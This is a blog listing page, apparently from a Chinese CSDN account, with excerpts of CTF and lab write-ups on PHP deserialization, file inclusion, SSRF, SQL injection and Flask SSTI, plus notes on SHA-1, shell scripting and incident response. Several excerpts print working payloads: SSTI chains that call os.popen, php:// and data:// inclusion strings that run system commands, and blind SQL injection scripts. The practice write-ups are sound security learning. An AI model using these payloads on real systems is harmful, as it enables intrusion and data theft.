- 博客(63)
- 收藏
- 关注
原创 [MRCTF2020]Ezpop
文章目录题目源码魔术方法wakeuptostringinvokeget构造pop链题目源码pop链的构造题目源码 <?php//flag is in flag.phpclass Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append(
2021-05-15 15:01:32 293
原创 [BSidesCF 2020]Had a bad day
进入页面,让你在woofers和meowers中选择一个点击woofer是给一张狗狗的图片,meowers是一张猫猫的图片关键点在于urlhttp://8a506345-44e3-4d0e-821d-ed711c30f04b.node3.buuoj.cn/index.php?category=meowersget方式传参了meowers,得到了猫猫的图片那么这里是否能去读取一些文件呢?category=php://filter/convert.base64-encode/resource.
2021-05-13 21:31:57 350
原创 CTFshow渔人赛---神仙姐姐
刚拿到题目时候,题目给了提示磕首千遍,原本准备在控制台上搞些骚操作,没搞出来反而发现每次拜后都会访问http://746d7288-51da-47d2-aff5-d71db85daac0.challenge.ctf.show:8080/sx.php没访问一次 就会加一次拜的次数所以 怀疑可以burpsuit直接intruder模块这里我没用burpsuit而是自己编写了个脚本 密码学 数据结构 让我编的奔溃 我要敲代码import requestsurl="http://01.
2021-05-13 16:34:14 832
原创 密码学---sha1编程
密码学作业—编程能力属实拉跨了# 明文转二进制def bin_trans(mw): b = "" for i in mw: c = bin(ord(i))[2:] while len(c) < 8: c = '0' + c b = b + c return b# 对转换后的位字符串进行补位操作 并且转为16进制def supplement(c): length = len(c)%512.
2021-05-13 15:51:01 252
原创 Hackthebox----Oopsie
文章目录信息收集登录webshell权限提升信息收集nmap扫描ip地址nmap -sC -sV 10.10.10.28-sV返回选项找出远程主机上运行的服务版本。-sC: 等价于–script=default,使用默认类别的脚本进行扫描 可更换其他类别22端口就是ssh端口靶机是Ubuntu系统,开放了22端口和80端口22端口: ssh端口80端口:80端口是为HTTP(HyperText Transport Protocol)即超文本传输协议开放的,此为上网冲浪使用次数最
2021-04-20 13:27:48 448 1
原创 [Zer0pts2020]Can you guess it?
给了源码<?phpinclude 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)");}if (isset($_GET['source'])) { highlight.
2021-04-15 22:58:50 131
原创 [FBCTF2019]RCEService
文章目录解法一 %0A截断解法二:PHP利用PCRE回溯次数限制绕过某些安全限制进入页面要求用json的格式上传命令解法一 %0A截断{"cmd":"ls"}尝试cat 读取源码 发现被禁止了尝试%0A绕过cmd={%0A"cmd":"/bin/cat ../../../home/rceservice/flag"%0A}写下自己的疑惑和解答先把源码附上<?phpputenv('PATH=/home/rceservice/jail');if (isset($_R
2021-04-14 20:18:37 713
原创 [CSCCTF 2019 Qual]FlaskLight
文章目录正式解题解法一解法二 昨天的题目 今天来写笔记我已经习惯用Arjun工具去扫描参数了…其实这道题F12有提示是get传参 参数为searchtplmap一把梭 失败正式解题解法一工具失败就开始手工注入吧{{[].__class__.__base__.__subclasses__()}}爆出类[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type '
2021-04-14 18:05:27 197
原创 [WUSTCTF2020]颜值成绩查询
sql注入的布尔盲注 过滤了空格直接交expimport requestsurl = "http://8eda0aa2-9a0e-4fd3-93c1-f3face942c15.node3.buuoj.cn/"payload =r"_-abcdefghijkmlnopqrstuvwxzy{}123456789!@#$%^&(),"flag = ""def colounm(): for i in range(1,50): for j in payload: .
2021-04-13 15:59:29 225
原创 Shell学习
文章目录第一个shell脚本第一个shell脚本新建一个first.sh文件#!/bin/bashecho "Change a new page in 1996:Pepsi."echo "The moon is getting round,and things will get better."echo "Date: 2021/4/10 10:45"echo "Address: Baskerball Court"顺手记录一下wyw小盆友给我的治愈.#!/bin/bash 是一个
2021-04-13 14:44:01 169
原创 HackTheBox-------ScriptKiddie
文章目录题记信息收集题记第一次做渗透测试 有点兴奋~信息收集namp 扫描ip地址 发现开放的端口访问一下端口是一个在线的nmap工具(好像看过类似的CTF题目…)扫描一个ip地址试试是Nmap的7.80版本...
2021-04-11 17:20:47 250
原创 [极客大挑战 2019]RCE ME
题目源码<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }.
2021-04-08 17:47:12 180
原创 [SUCTF 2019]Pythonginx
题目给的源码@app.route('/getUrl', methods=['GET', 'POST'])def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我扌 your problem? 111" parts = list(urlsplit(url)) host = part.
2021-03-31 15:36:55 195
原创 [BJDCTF2020]Cookie is so stable
Twig SSTI模板注入和前面做的jinja2有点不同,学习一下SSTI模板注入 Twig重点内容在getFilter()方法中的874行上有对危险函数call_user_func的调用。如果我们能够控制这个参数,就可以用它来调用任意的PHP函数。public function getFilter($name){ [snip] foreach ($this->filterCallbacks as $callback) { if (fals.
2021-03-31 15:04:34 134
原创 [网鼎杯 2020 朱雀组]phpweb
一开始没有啥思路抓了个包 发现可以传参 再结合报错 这里应该是可以利用函数的返回的index.php源代码$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_repl.
2021-03-31 14:18:38 177
原创 [BJDCTF2020]Mark loves cat
dirsearch扫描目录git泄露 我githack出猫病了 !得到两个文件flag.php<?php$flag = file_get_contents('/flag');index.php<?phpinclude 'flag.php';$yds = "dog";$is = "cat";$handsome = 'yds';foreach($_POST as $x => $y){ $$x = $y;}foreach($_GET as $x =.
2021-03-31 13:44:02 116
原创 CTFSHOW SSRF
文章目录web351web352web351payload:url=http://127.0.0.1/flag.phpweb352源码<?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$x=parse_url($url);if($x['scheme']==='http'||$x['scheme']==='https'){if(!preg_match('/localhost|127.0.0
2021-03-30 16:48:14 244
原创 CTFshow 反序列化
文章目录web254web255web256web257**题记:**今天来复习反序列化web254第一道题不是序列化和反序列化吧… error_reporting(0);highlight_file(__FILE__);include('flag.php');class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; publ
2021-03-29 17:04:10 628 1
原创 Vulhub Apache HTTPD 多后缀解析漏洞
简介Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件:AddType text/html .htmlAddLanguage zh-CN .cn其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文件index.cn.html,他将返回一个中文的html页面。如果运维人员给.php后缀增加了处理器AddHandler application/x-httpd-p
2021-03-28 00:08:05 418 2
原创 Apache HTTPD 换行解析漏洞
简介Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。复现先上传一个php文件这个时候会返回一个badfile接着将70后面改为0a再次上传 页面返回就是成功上传了访问的时候需要在xiaoma.php后面加个%0A大佬的文章...
2021-03-27 23:27:35 214
原创 CTFSHOW 文件包含
今天 复习一下文件包含漏洞web 78payload:?file=php://filter/convert.base64-encode/resource=flag.phpweb 79payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=web 80-81这道题开始就有技巧了源码 过滤了 php和data 伪协议用不了if(isset($_GET['file'])){ .
2021-03-27 16:17:04 238
原创 CTFSHOW WEB入门 命令执行做题笔记(持续更新)
校队考核被打自闭了 回炉重造文章目录29-362930313233-3637-443738394029-3629<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}大小写过滤了flag自己构造的p
2021-03-27 11:52:43 387
原创 Vulhub Flask SSTI漏洞复现
文章目录环境搭建漏洞复现python3python2CTFSHOWWEB361WEB362WEB363环境搭建首先利用docker搭建好环境 docker-compose up -ddocker ps查看搭建的端口:8000漏洞复现开始复现flask-ssti漏洞以前有总结过 整理的不够好 今天重新整理一下题目源码from flask import Flask, requestfrom jinja2 import Templateapp = Flask(__name__)
2021-03-26 00:14:37 1104
原创 应急响应流程
文章目录windows文件分析开机启动项目检查temp临时异常文件浏览器信息分析文件夹时间属性分析文件分析-最近打开文件分析可疑进程发现与关闭系统信息Windows计划任务隐藏账号发现与删除恶意进程-发现与关闭补丁查看与更新Webshell查杀Linux分析排查文件分析-敏感文件信息tmp/etc/init.d/新增文件分析:网络连接分析进程分析- 进程所对文件登录分析异常用户的分析排除历史命令分析history计划任务排查 crontab$PATH变量异常windows系统日志分析windows文件分
2021-03-24 15:17:55 491
原创 Buuctf [GKCTF2020]CheckIN
进入网站直接贴了源码<title>Check_In</title><?php highlight_file(__FILE__);class ClassName{ public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.
2021-03-19 17:30:43 350
原创 SSTI模板注入总结
文章目录python 模板Flask Jinja 2敏感信息泄露的身份伪造python 模板Python的模板有Tornado、Flask、Django模板引擎通过对模板进行动态的解析,将传入模板引擎的变量进行替换,最终展示给客户SSTI服务端模板注入正是因为代码中通过不安全的字符串拼接的方式来构造模板文件而且过分信任用户的输入造成的Flask Jinja 2语法{%……%} 语句{{…}}打印模板输出表达式{#…#} 注释#…##行语句敏感信息泄露的身份伪造...
2021-03-19 14:45:48 441 1
原创 Buuctf [第三章 web进阶]SSTI 20
进入页面用arjun扫描一下有什么url参数这道题是最基础的了直接给payload前面的payload吧{{''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')}}页面返回:password is wrong: app bin boot dev etc home lib lib64 media m.
2021-03-19 14:14:22 1546
原创 buuctf [pasecactf_2019]flask_ssti
题目已经告诉是SSTI模板注入了测试一下做题时用""发现了过滤 fuzz一下过滤了很多东西想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换附上自己写的python脚本code = "/proc/self/fd/1"ssti = ""length = len(code)for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:]print(ssti)将下面内容转化为16进制__class__.
2021-03-18 21:23:42 1282
原创 虚拟机 Git clone 所遇到的问题
git clone https://xxxxxxxxx.com返回报错 connection refused- 将https改为git
2021-03-17 11:11:24 1758
原创 BUUCTF RootersCTF2019]I_<3_Flask
文章目录手注tplmap手注刚进入题目 知道是SSTI注入 但是没找到注入点学到了一个新的工具 Arjun扫描到get参数name?name={{'aaa'.upper()}}确定是SSTI注入构造payload:{% for c in [].__class__.__base__.__subclasses__()%}{% if c.__name__== 'Popen' %}{{c.__init__.__globals__['os'].popen('ls').read()}}{% en
2021-03-17 11:06:18 329 1
原创 BUUCTF [PASECA2019]honey_shop
文件读取和session伪造发现购买flag的钱差1元其实大概就是这样,我们距离我们最想得到的就差那么一丢丢,买不了flag我们可以买蜂蜜嘛…进入正题题目有个提示click to download our sweet images大概题目的切入点就是这个 下载的时候抓个包发现/download?image=2.jpg,发现download目录,我们就可以尝试一下能不能去获取其他有用的信息可以读取到其他有用的信息昨天做题的时候做到了Linux下的一个文件复习一下Linux下.
2021-03-16 18:15:12 430
原创 PIP安装模板后脚本依然不能运行解决方法
今天用到了flask_session_cookie_manager使用时报错pip list查看发现已经安装了itsdangerous模块解决方法python3找到自己对应的python版本在该版本下安装模块python3.7 -m pip install itsdangerous
2021-03-16 18:13:38 352
原创 文件读取
文章目录文件读取漏洞常见读取路径Linuxwindows例题[第一章 web入门]afr_1[第一章 web入门]afr_2原理文件读取漏洞常见读取路径Linuxflag名称(相对路径)…/…/…/…/…/…/flag(.txt|.php|.pyc|.py)flag(.txt|.php|.pyc|.py)等等服务器信息(绝对路径)/etc:/etc目录下是各种应用或系统配置文件/etc/passwd:是Linux系统保存用户信息及其工作目录的文件,权限是所有用户/组可读
2021-03-15 17:38:58 262
原创 信息搜集
文章目录分类敏感目录泄露git泄露SVN泄露HG泄露敏感备份文件gedit备份文件vim备份文件常规文件Banner识别实例[第一章 web入门]常见的搜集[第一章 web入门]粗心的小李分类敏感目录、敏感备份文件、Banner识别等敏感目录泄露git泄露git是一个主流的分布式版本控制系统,开发人员在开发过程中经常遗忘.git泄露导致攻击者可以通过.git文件获取源代码SVN泄露HG泄露敏感备份文件gedit备份文件在Linux下,用gedit编辑器保存后,当前目录会生成~后
2021-03-12 15:43:15 161
原创 BUU SQL COURSE 1
进入题目给了两个页面一开始以为在注入点在登录页面 尝试了万能密码 和 各种闭合 没发现注入的方式接着尝试了热点列表页面的注入 但是url上好像不存在注入F12在net中找到了隐藏的url访问content_detail.php?id=1页面构造payload?id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()## admin、co.
2021-03-12 10:44:37 3468 1
原创 [RCTF2015]EasySQL
看到login和register界面 第一个想法就是二次注入但是我看到了change password想到了以前做过的一道题目尝试一了一下越权修改密码发现不行继续尝试二次注入吧在register.php页面注册账号用户名:root密码:123email:123登录成功后 点击chage password页面修改密码发现报错猜测一下执行的语句select * from user where username ="root\" and pwd='65c94593b88237.
2021-03-11 18:28:30 196
原创 BJDCTF2020]EasySearch
dirsearch扫描发现index.php.swp文件 给了源码<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$char.
2021-03-11 16:43:14 206
原创 [BJDCTF 2nd]简单注入
访问robots.txt,得到hint.php,得到sql注入的源码select * from users where username='$_POST["username"]' and password='$_POST["password"]';一开始尝试了一些'闭合okkk!'被过滤了那就从这个sql语句入手想想办法记得以前学过一个addslashes()函数利用\去转义,看看效果select * from users where username='123\' and pass.
2021-03-11 16:07:20 232
原创 BUUCTF [极客大挑战 2019]FinalSQL
12345都点过了 访问id=6 提示Clever! But not this table.这里猜测id这里存在SQL注入,而不是以前的登录框初步判断了一下,是一个数字型注入 且过滤了一些字符 需要fuzz一下空格被过滤掉了用() union注入这些也被过滤的差不都了FinalSQL可以想想到应该是盲注类型的题目 嘿嘿嘿^没有被过滤 可以在这里去搞点事情做做题目有提示是盲注 所以这种题目还是跑脚本import requestsimport sysimport timedef g.
2021-03-09 17:23:06 347
原创 BUUCTF [De1CTF 2019]SSRF Me
审计一下源码,稍微加了一些注释#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert.
2021-03-09 11:29:50 295
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人